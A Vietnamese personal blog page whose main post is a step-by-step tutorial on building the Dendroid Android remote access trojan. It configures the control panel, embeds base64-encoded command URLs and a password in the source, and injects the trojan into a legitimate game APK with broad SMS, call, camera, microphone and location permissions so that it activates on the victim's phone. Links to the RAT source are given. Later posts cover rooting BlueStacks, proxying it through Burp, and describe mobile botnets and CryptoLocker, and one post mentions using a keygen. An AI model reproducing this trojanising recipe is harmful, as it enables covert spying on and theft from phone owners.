Friday, October 10, 2014

Hướng dẫn tạo RAT ( Remote Access Trojan ) Android

Lâu lâu rồi viết một bài.

Sử dụng bài viết với mục đích học tập, đừng có nghịch ngợm phá hoại he2

Bắt đầu

*****

Các tool cần thiết

1. Apktool

- Dùng để disassemble và recompile file APK

- Dùng APK_OneClick có tích hợp Apktool

https://drive.google.com/file/d/0B1faMeCzYBAwQnNOci1fcG9sRjA/view?usp=sharing

Download về chạy shellext-add.bat

Khi Disassemble hay Recompile chọn chuột phải vào file apk hay thư mục.

2. Tool Base64

https://drive.google.com/file/d/0B1faMeCzYBAwYThfMVB4b2ltaG8/view?usp=sharing

3. Source code remote access trojan

https://drive.google.com/file/d/0B1faMeCzYBAwcEEtWk1UemlsOWc/view?usp=sharing

Các bước

Bước 1 :

1. Tạo Web server để điều khiển

Source website DendroidSource-master\Dendroid Panel

Cách thiết lập

- Vào Dendroid Panel\Dendroid Panel\DendroidRAT chỉnh sửa file reg.php

$allowedDomains = array("www.domain.com", "domain.com");

Thay bằng địa chỉ domain của mình, ví dụ chạy trên localhost (IP local ví dụ 192.168.0.103) để

$allowedDomains = array("192.168.0.103");

- Kết nối database dùng database

DendroidSource-master\Dendroid Panel\Dendroid Panel\Other Files\SQL.sql

Khi vào Web panel lần đầu thiết lập các thông số ( ví dụ như hình)

Bước 2 :

1. Tạo app apk remote access trojan

Dùng Eclipse tạo project android from Existing Code và trỏ tới thư mục “DendroidSource-master /Dendroid APK”

Vào source code src/com/connect/DroiddianService.java chỉnh sửa các thông số

private String encodedURL = "aHR0cDovLzE5Mi4xNjguMC4xMDMvRGVuZHJvaWRSQVQ="; //base 64 URL website http://192.168.0.103/DendroidRAT

private String backupURL = "aHR0cDovLzE5Mi4xNjguMC4xMDMvRGVuZHJvaWRSQVQ=";

private String encodedPassword = "aGF2ZWZ1bg=="; //base64 password "havefun"

Với encodedURL là base64 của website panel ( ví dụ như http://192.168.0.103/DendroidRat ); có thể dùng tool Base64 ở trên.

- Password ở dạng base64 (với code tải về là base64 của “havefun” ); nếu muốn thay đổi password sửa các file trong source website

upload-picture.php

new-upload.php

get-function.php

get.php

Build và Run Project.

Để theo dõi chỉ cần cài ứng dụng “Droidian.apk” trên máy victim.

1. Bước 3

Gắn ứng dụng trojan Droidian.apk vào các ứng dụng apk khác

Ví dụ gắn trojan này vào app “CutTheRope2.3.apk”. Link apk

https://drive.google.com/file/d/0B1faMeCzYBAwbVBTaGVlT21icVk/view?usp=sharing

- Dùng Apktool (hoặc APK one click ở trên) disassemble 2 file “CutTheRope2.3.apk” và “Droidian.apk”
- Copy toàn bộ các file trong Droidian-disasm\smali vào CutTheRope2.3-disasm\smali

Chon “merge folder” và “don’t copy same file”

Và

- Sửa file AndroidManifest của CutTheRope

Xem ThemFileManifest.txt trong DendroidSource-master

Thêm vào trong thẻ <application></application>

<intent-filter android:priority="1000">

</intent-filter>

</receiver>

Thêm các permission ( thường trước đóng thẻ </manifest> )

<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

<uses-permission android:name="android.permission.QUICKBOOT_POWERON" android:required="false" />

<uses-permission android:name="android.permission.INTERNET" android:required="true" />

<uses-permission android:name="android.permission.READ_SMS" android:required="true" />

<uses-permission android:name="android.permission.WRITE_SMS" android:required="true" />

<uses-permission android:name="android.permission.GET_ACCOUNTS" android:required="true" />

<uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS" />

<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" android:required="true" />

<uses-permission android:name="android.permission.READ_CONTACTS" android:required="true" />

<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" android:required="true" />

<uses-permission android:name="android.permission.GET_TASKS" android:required="true" />

<uses-permission android:name="android.permission.WAKE_LOCK" android:required="false" />

<uses-permission android:name="android.permission.CALL_PHONE" android:required="true" />

<uses-permission android:name="android.permission.SEND_SMS" android:required="true" />

<uses-permission android:name="android.permission.WRITE_SETTINGS" android:required="false" />

<uses-permission android:name="android.permission.READ_PHONE_STATE" android:required="false" />

<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" android:required="true" />

<uses-permission android:name="android.permission.CAMERA" android:required="true" />

<uses-permission android:name="android.permission.RECORD_AUDIO" android:required="false" />

<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" android:required="true" />

<uses-permission android:name="android.permission.RECEIVE_SMS" android:required="true" />

<uses-feature android:name="android.hardware.camera" android:required="false" />

<uses-feature android:name="android.hardware.camera.front" android:required="false" />

<uses-feature android:name="android.hardware.camera.autofocus" android:required="false" />

<uses-feature android:name="android.hardware.microphone" android:required="false" />

Recompile lại app CutTheRope, cài vào máy điện thoại và khi khởi động lại điện thoại thì trojan remote được kích hoạt

Thursday, November 28, 2013

Sử dụng Bluestack qua proxy BurpSuite bằng ProxyCab

B1 : Cài đặt ProxyCap

https://drive.google.com/file/d/0B1faMeCzYBAwS19MYlFLR1lUOUU/edit?usp=sharing

( Hết trial sử dụng keygen – dùng patch là ok )

B2 : Thiết lập Burpsuite

Ví dụ chọn port 8009

B3 : Thiết lập Burpsuite bắt request từ Bluestacks qua ProxyCap

- Trong Proxies chon New

Lựa chọn HTTP và cổng Burpsuite ( như trên chọn 8009 )

Click OK, tương tự thêm proxy và chọn cổng HTTPS

Hình ảnh sau khi thêm proxy

Tiếp theo set ProxyCab rules để bắt request BlueStack

Tạo 2 rules cho HTTP và HTTPS

Tại mục Rules chọn New

Trong cài đặt chọn như hình, click Browse

Chọn đến HD-Network.exe trong thư mục cài đặt BlueStacks (C:\Program Files\BlueStacks )

Chọn proxy ( đã set HTTP ở trên ) , chọn Specify là 80, click OK

Tương tự cho HTTP với cổng 443

Hình ảnh sau khi set rules

Việc thiết lập như trên là OK.

Tuy nhiên có thể thiết lập thêm (nếu hệ thống không sử dụng proxy server)

Tại Rules chọn như hình

Tại mục Program (1) chọn Add (2) , chọn đến thư mục cài đặt Blustacts thêm HD-Agent.exe và HD-Frontend.exe. Click OK

Tương tự cho Rule 2 HTTPS

----QED---

Tuesday, November 19, 2013

Hướng dẫn chơi Clash of Clans trên PC bằng BlueStack có kết nối tài khoản Google

Dù không thích khi chơi bằng điện thoại nhưng chơi clash of clans trên PC các bạn sẽ không lo hư pin ai chơi clash of clans thì chắc phải sạc pin suốt rồi.
Ngoài ra bản hướng dẫn này giúp các bạn kết nối với tài khoản google

B1 : Cài đặt Bluestack root + cài google play

http://khvscn.blogspot.com/2013/11/huong-dan-cai-at-bluestacks-ban-08-root.html

B2. Tải game clash of clans trên google play về chơi qua màn hướng dẫn chọn kết nối với tài khoản google
- Trong quá trình kết nối có thể yêu cầu cài đặt google play service

--Q.E.D--

Hướng dẫn cài đặt Bluestacks ( bản 0.8) - Root và Google Play

Đây là công cụ giúp người dùng trải nghiệm kho ứng dụng (lên tới 450.000) Android trên máy tính chạy HĐH Windows. Ưu điểm là nhẹ và mượt hơn giả lập android sdk.
Cách cài đặt + root

Tải bản 0.8.1.3051 BlueStacks_HD_AppPlayerICS_setup_0.8.1.3051_REL.msi

https://drive.google.com/file/d/0B1faMeCzYBAwcU1FelpJWjJkb3c/edit?usp=sharing

Tiến hành cài đặt
Thoát BlueStacks

- 32 bit vào C:\Program Files\Bluestacks kích đúp HD-Quit.exe.
- 64 bit vào C:\Program Files (x86)\Bluestacks kích đúp HD-Quit.exe.

Vào thư mục dữ liệu của Bluestacks

- Windows 7/8/8.1 vào C:\Program Data\BlueStacks

- Windows XP vào C:\Documents and Settings\All Users\Application Data\BlueStack

Xóa 2 file Root.fs và initrd.img ( trong folder Android)

Thay thế bằng 2 file mới vào

Root.fs

https://drive.google.com/file/d/0B1faMeCzYBAwZUp2UWlMNDdvLVE/edit?usp=sharing

initrd.img

https://drive.google.com/file/d/0B1faMeCzYBAwTk9JZHFhb0l3NW8/edit?usp=sharing

Khởi động lại Bluestacks là xong

Cài đặt google play

Cài đặt google play giúp tìm và cài đặt các ứng dụng dễ dàng hơn

Download nguyên liệu về giải nén

https://drive.google.com/file/d/0B1faMeCzYBAwa0stcWRqU1NEb1E/edit?usp=sharing

Chạy cmd từ folder download về ( Phím tắt Shift + chuột phải chọn Open command .. )

Từ cmd gõ các câu lệnh kết nối adb với Bluestack cài đặt rootexplorer và copy 3 file vào bộ nhớ máy

adb connect 127.0.0.1:5555

adb install rootexplorer.apk

adb push GoogleServicesFramework.apk mnt/sdcard

adb push MarketUpdater.apk mnt/sdcard

adb push Vending.apk mnt/sdcard

Trong Bluestack chạy Root explorer ( nhớ đồng ý quyền root), Vào sdcard copy 3 file ( 3 file GoogleServicesFramework.apk, MarketUpdater.apk, Vending.apk ) vào thư mục /system/app

Set quyền 644 cho 3 file vừa copy ( giữ vào file sẽ hiện ra lựa chọn permission )

Khởi động lại Bluestack là có google play

*** Update 9/2014
Google update google service nên cần tải file này về và cài đặt ( kích đúp )

https://drive.google.com/file/d/0B1faMeCzYBAwR0ZuSlI5VEQwU28/edit?usp=sharing

--Q.E.D--

Monday, November 4, 2013

Mạng Botnet trên di động

Giới thiệu

Các thiết bị Mobile ngày càng trở nên thông dụng và kết nối nhiều với nhau nên ngày cảng trở nên phức tạp và dễ bị tổn thương, Botnet dựa trên SmartPhone bị sử dụng cho những phạm tội tương tự như thư rác , DdoS …

Khái niệm mạng botnet trên máy tính

Botnet là một mạng gồm từ hàng trăm tới hàng triệu máy tính bị điều khiển hoàn toàn (theo thuật ngữ người ta gọi các máy tính này là Zombie tức các thây ma),chúng bị điều khiển để cùng làm một công việc gì đó theo mục đích của hacker điều khiển chúng vd: tải về cài đặt các chương trình quảng cáo, hay cùng đồng loạt tấn công một trang web nào đó thông qua kĩ thuật DDoS

Nền tảng của BotNet là một chương trình máy tính được thiết kế để liên lạc với hacker ,nhận lệnh và thực hiện lệnh của hacker, người ra gọi chương trình này là “Bot” (viết tắt từ robot).

Mô hình hoạt động mạng botnet trên di động

Giai đoạn 1 : Tin tặc phát tán mã độc ( virus, malware, trojan …) để thu về những thiết bị di động “ ma” tạo thành một mạng botnet

Giai đoạn 2 : Dùng mạng botnet thực hiện các hành vi phạm pháp như gửi thư rác, gửi tin nhắn dịch vụ, DDOS …

Mobile botnet

Các moblie bot đã được phát hiện lần đầu vào năm 2011 bởi DroidDream và Geimimi – hai ứng dụng trò chơi độc hại trên nền tảng Android. Bằng cách gửi qua email, nhúng trong các ứng dụng lậu, nhúng vào các trang web người dùng sẽ tải các tập tin đó về, ngay khi cài đặt điện thoại sẽ bị nhiễm trojan và trở thành zombie- moblie.

Khi điện thoại trở thành một phần của botnet sẽ gây ra các hậu quả

- Gián đoạn hoặc từ chối truy cập mạng

- Ăn cắp thông tin người dùng như tên đăng nhập, mật khẩu …

- Gửi tin nhắn tới các đầu số thu phí.

- Cài đặt hay gỡ bỏ các ứng dụng khác

- Mở một trang web độc hại hay chứa quảng cáo

Tháng 9/2013 theo thông báo của các chuyên gia Kasperky Lab đã phát hiện trường hợp sử dụng trojan Obak.a tạo mạng botnet ( sử dụng giai đoạn 1) các thiết bị di động sử dụng hệ điều hành android

Bằng cách kết hợp trojan Obak.a và trojan SMS.AndroidOS.Opfake.a ., attacker gửi một tin nhắn văn bản tới người dùng yêu cầu họ tải tin nhắn MMS

““You have a new MMS message, download at - http://otkroi.net/12”

Khi người dùng truy cập vào địa chỉ URL sẽ tải về file mms.apk hay mmska.apk. trong đó chứa trojan Backdoor.AndroidOS.Obad.a .

Khi cài đặt tập tin này trojan bằng cách kết hợp SMS.AndroidOS.Opfake.a sẽ gửi tin nhắn tương tự tới các số liên lạc lưu trên thiết bị mới bị nhiễm Đây là một hệ thống được tổ chức bài bản: một nhà mạng di động ở Nga cho biết có hơn 600 tin nhắn chứa những liên kết này được phát tán chỉ trong 5 giờ. Hầu hết các trường hợp phần mềm độc hại được phát tán sử dụng các thiết bị đã bị lây nhiễm.

Ngoài việc dùng botnet di động, Trojan có độ phức tạp cao này cũng phân phối bằng các tin nhắn rác. Thông thường một tin nhắn cảnh báo người sử dụng chưa trả nợ hút nạn nhân theo một liên kết tự động tải Obad.a vào thiết bị di động. Tuy nhiên, người dùng phải chạy các tập tin tải về để cài đặt Trojan.

Các kho ứng dụng giả mạo, sao chép nội dung các trang Google Play và thay thế những liên kết hợp pháp bằng liên kết độc hại, lan truyền Backdoor.AndroidOS.Obad.a.

Google Play fake store

Người dùng hãy tự bảo vệ mình

Có thể thấy nguyên nhân cơ bản tiếp tay cho sự phát tán của các mã độc một phần là do người dùng có thói quen thích truy cập các trang web không lành mạnh, những đường link chào mời hấp dẫn…

Một số lời khuyên để smartphone không bị nhiễm phần mềm độc hại

- Chỉ tải ứng dụng từ các nguồn tin cậy

- Cài đặt chương trình chống virus (AVG Antivirus, BKAV, … cho Android )

- Để ý tới yêu cầu “chấp nhận: khi cài ứng dụng

Thao tác của người dùng quyết định phần lớn độ an toàn, do đó cần hết sức thận trọng, cảnh giác. Tốt nhất nên tự trang bị một phần mềm bảo vệ có thể tự động quét các liên kết đang truy cập cũng như các ứng dụng đang tải về để đánh giá mức độ an toàn.

Cryptolocker – mối nguy hiểm mới với người dùng Internet

Cryptolocker – mối nguy hiểm với người dùng Internet

Là một malware (phần mềm độc hại ) lây nhiễm qua internet và nếu bạn không may mắn nhiễm phải, máy tính của bạn (các tập tin trong máy ) sẽ không thẻ sử dụng được. Và phải trà tiền vài trăm $ nếu muốn lấy lại dữ liệu. Phần mềm độc hại Cryptolocker nhắm tới các mục tiêu là máy tính chạy hệ điều hành Windows.

Các Cryptolocker ; ransomware ( ransom : trả tiền chuộc + ware) sẽ mã hóa dữ liệu trên máy nạn nhân và để lại tối hậu thư “Trả tiền hoặc mất dữ liệu “. Những người bị nhiễm sẽ nhận được thông báo , sau đó là yêu cầu thanh toán “tiền chuộc”, thông thường khoảng 100$-700$ hoặc 2 Bitcoin để có được tập tin trở lại.

Tháng 11 những tên tội phạm đứng đằng sau Cryptolocker đã lập ra một website “Giả mã dịch vụ Cryptolocker “ để nạn nhân có thể mua các chìa khóa giải mã các tập tin bị mã hóa. Trong khi phần mềm trong hệ thống chỉ yêu cầu 2 Bitcoin ( khoảng 450$) để giải mã thì dịch vụ vừa được tung ra có giá tăng đáng kể 10 Bitcoin (2100$)

Dịch vụ chạy trên các hosting của Nga http://yocmvpiarwmfgyg.net/ hoặc http://93.189. 44.187 hoặc mạng tor http://f2d2v7soksbskekh.onion/

Tại sao các hacker đưa ra các dịch vụ giải mã

Hầu hết các chương trình diệt virus đã cập nhật chương trình diệt virus Cryptolocker, phát hiện và loại bỏ các registry key ra khỏi hệ thống . Tuy nhiên nó cần thiết để trả tiền chuộc và giải mã. Và nếu phần mềm bị xóa nạn nhân sẽ không nhận được khóa ( khi nạn nhân cần lấy lại dữ liệu quan trọng và chấp nhận mua khóa)

Vì vậy nhóm tội phạm đã đưa ra website giải mã , được thiết kế giống như một trang web “hỗ trợ khách hàng” cho nạn nhân

Nạn nhân tải lên một trong số các file bị mã hóa, sau khi tải lên một trang đơn hàng hiển thị và sau khi thanh toán 10 Bitcoin sẽ nhận được khóa và công cụ dùng để giải mã.

CryptoLocker đã được tìm thấy ở các khu vực khác nhau gồm cả châu âu , trung đông, bắc mỹ và châu á thái bình dương 64% các nạn nhân là người mỹ.

Nguồn : http://thehackernews.com/

Được thực hiện với sự trợ giúp của google dịch J